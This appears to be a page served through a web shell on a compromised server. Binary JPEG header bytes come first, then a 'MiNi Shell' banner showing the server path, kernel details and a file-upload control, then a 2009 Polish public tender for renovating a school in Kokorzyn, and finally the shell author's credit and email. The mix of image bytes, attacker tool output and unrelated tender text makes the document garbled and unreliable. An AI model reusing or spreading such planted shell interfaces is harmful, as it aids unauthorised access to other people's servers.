JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090505/70861-N-2009.html

<p class="kh_header"><b>Kościan: Przebudowa szkoły w Kokorzynie</b><br>
<b>Numer ogłoszenia: 70861 - 2009; data zamieszczenia: 05.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Kościan , ul. Młyńska 15, 64-000 Kościan, woj. wielkopolskie, tel. 065 5121001, faks 065 5120315.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminakoscian.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa szkoły w Kokorzynie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DANE EWIDENCYJNE:
POWIERZCHNIA ZABUDOWY 363,00 M2
POWIERZCHNIA UŻYTKOWA
.  PARTER - 247,34 M2
.  PIETRO  - 259,94 M2
KUBATURA 3200,00 M3
5.0 OPIS PRAC DO WYKONANIA :
.  Wyburzenie ścianek działowych na parterze i 1 piętrze .
.  Wykonanie przekucia w ścianie konstrukcyjnej oraz osadzenie nadproży stalowych z dwuteownika IPE 200 , IPE 240 oraz wykonanie wyprawek tynkarskich z tynku cemwap. kat. III
.  Nowe ścianki działowe z cegły kratówki murowane na zaprawie cem-wap marki 3,0
MPa .
.  Skucie istniejacej posadzki lastrykowej i wykonanie nowej posadzki cementowej pod płytki ceramiczne . Posadzkę należy przed ułożeniem płytek zagruntować
.  Istniejace ściany wewnętrzne oraz sufit należy pomalować dwukrotnie farbą emulsyjna w kolorach opisanych na rzucie kondygnacji.
.  Na ciagach komunikacyjnych nalży wykoanć zabudowę pionów kanalizacyjnych z
płyty STG gr. 12 mm na konstrukcji stalowej. i ułożyc na niej nową z płytek ceramicznych o wymiarach 30x30 na klej .
.  Istniejącą stolarkę drzwiową wewnętrzną należy wykuć i wymienić na nową litą
drewniana sosnowa malowana w kolorze ciemny orzech.
.  Na ciagach komunikacyjnych należy wykonać skucie tynków na wysokosci 60 cm i
ułożyć płytki ceramiczne na klej , w taki sposób i płytka licuje z tynkiem .
.  Na istniejacych schodach należy zdemontować balustradę , skuć płytki lastrykowe i
wykonać nowe obłożenie z płytek stopni , podstopni oraz cokołu. Dodatkowo należy
wykonać nową balustradę stalową z dodatkowym pochwytem . Balustrdę należy
wykonać wg. rysunku szczegółowego.
.  Istniejacą stolarkę okienną należy zdemontować i zamontowac nową z PCV . Stolarka
z PCV uchylno-otwieralna w kolorze białym z szybami o współczynniku przenikania
ciepła 1.1. Przy obróbce stolarki okiennej od wnętrza należy wykonać obudowy z
płyty STG gr. 12 mm na ruszcie stalowym .
.  Istniejace parapety zewnętrzne i wewnętrzne należy zdemontowac i założyc nowe z
PCV wewnątrz i z blachy stalowej powlekanej w kolorze brązowym zewnaąrz
budynku RAL 8007.
.  W wszystkich pomieszczeniach szkoły należy wykonac przygotowanie powierzchni
ścian i sufitów do malowania oraz wykonac na nich gładz gipsowa .
.  Na elewacji należy wykonac skucie tynków w miejscach zawilgoconych i wykonanie
nowego tynku cementowego kat. III . Wszystkie opaski przy oknach wykonane z
cegły pełnej oraz fragmentami na cokole naley otynkowac tynkiem cem-wap kat. III .
Dodatkowo należy wykonać pogrubienia z tynku w miejscach wskazanych na
elewacji.
.  Tynkowanie elewacji tynkiem nakrapianym , a nastepnie malowanie tynków
nakrapianych i gładkich farba akrylowa wg. kolorystyki elewacji.
.  Istniejace kominy powyżej połaci dachowej należy pomalowac farba .
.  Istniejace drzwi zewnetrzne należy wykonać jako nowe z litego drewna sosnowego malowane w kolorze ciemny orzech.
.  Istniejace schody ( stopnie) zewnętrzne znajdujace sie przy wejściu do budynku
należy skuć i wykonac na nowo . Schody należy zagruntować i ułożyc na nich płytki
ceramiczne mrozoodporne o IV stopniu scieralności. Na podeście wejściowym należy
zamontowac wycieraczkę stalową .
.  Na ścianach w pomieszczeniu gospodarczym numer 1/6 i 2/9 należy ułożyć płytki
ceramiczne do wys. 2,0 m. Płytki układac po uprzednim zagruntowaniu ścian na klej .
- należy wymienić instalację elektryczną

CPV: 45262700-8 Przebudowa budynków
45311000-0 Roboty w zakresie okablowania oraz instalacji elektrycznych
opis przedmiotu zamówienia zawarty jest w SIWZ, dokumentacji projektowej oraz w specyfikacją techniczną wykonania i odbioru robót budowlanych
 .</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.26.27.00-8, 45.31.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wykonawcy nie wnoszą wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział wykonawcy, którzy: 
1) posiadają uprawnienia do wykonywania działalności objętej przedmiotem zamówienia;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w tym: 
a) w okresie pięciu lat  (jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed dniem wszczęcia postępowania wykonali co najmniej dwie roboty polegające na budowie (odbudowie, rozbudowie, nadbudowie) lub/i przebudowie lub/i remoncie obiektu kubaturowego o wartości min. 200.000,00 zł brutto (każda)
b)  dysponują lub/i będą dysponować (przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia)  co najmniej po jednej osobie  posiadającej odpowiednie do przedmiotu zamówienia uprawnienia do kierowania robotami budowlanymi w specjalności:
-konstrukcyjno-budowlanej 
- elektrycznej
  3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
  4)  nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ww. ustawy,

Wykonawcy, którzy nie spełniają przedstawionych wyżej warunków zostaną wykluczeni z postępowania.
Ocena spełnienia warunków wymaganych od wykonawcy zostanie dokonany wg formuły spełnia/niespełna w oparciu o dokumenty, oświadczenia i inne materiały dołączone do oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Od wykonawców ubiegających się o przyznanie zamówienia wymagane jest przedstawienie następujących dokumentów:
1) pisemne oświadczenie Wykonawcy, że nie podlega wykluczeniu na podstawie art. 24 ust. 1 i ust. 2  oraz, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych, - wg załączonego wzoru
2) aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawione nie wcześniej niż  6 miesięcy przed upływem terminu składania ofert
3) wykaz wykonanych w ciągu ostatnich pięciu lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie robót polegających na budowie (odbudowie, rozbudowie, nadbudowie) lub/i przebudowie lub/i remoncie obiektów kubaturowych o wartości min 200.000,00 zł brutto wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane  należycie- wg załączonego wzoru
4)wykaz osób którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności ( w zakresie określonym warunkami udziału w postępowaniu pkt. 7 2) b) SIWZ )- wg załączonego wzoru wraz z dokumentami potwierdzającymi posiadanie uprawnień budowlanych i aktualnym na dzień składania ofert zaświadczeniem o przynależność do właściwej Izby
5)pisemne  zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt. 4), wykonawca wskazał osoby, którymi będzie dysponował.

Dokumenty te mogą być przedstawione w formie oryginałów lub kserokopii poświadczonych za zgodność z oryginałem przez wykonawcę.
Brak któregokolwiek z wymienionych powyżej dokumentów lub złożenie ich z błędem skutkować będzie wykluczeniem wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt. 3 ustawy.
 .</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gminakoscian.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kościan, ul. Młyńska 15 64-000 Kościan, pokój nr 21.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2009 godzina 10:00, miejsce: Urząd Gminy Kościan, ul. Młyńska 15, 64-000 Kościan, pokój nr 13 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com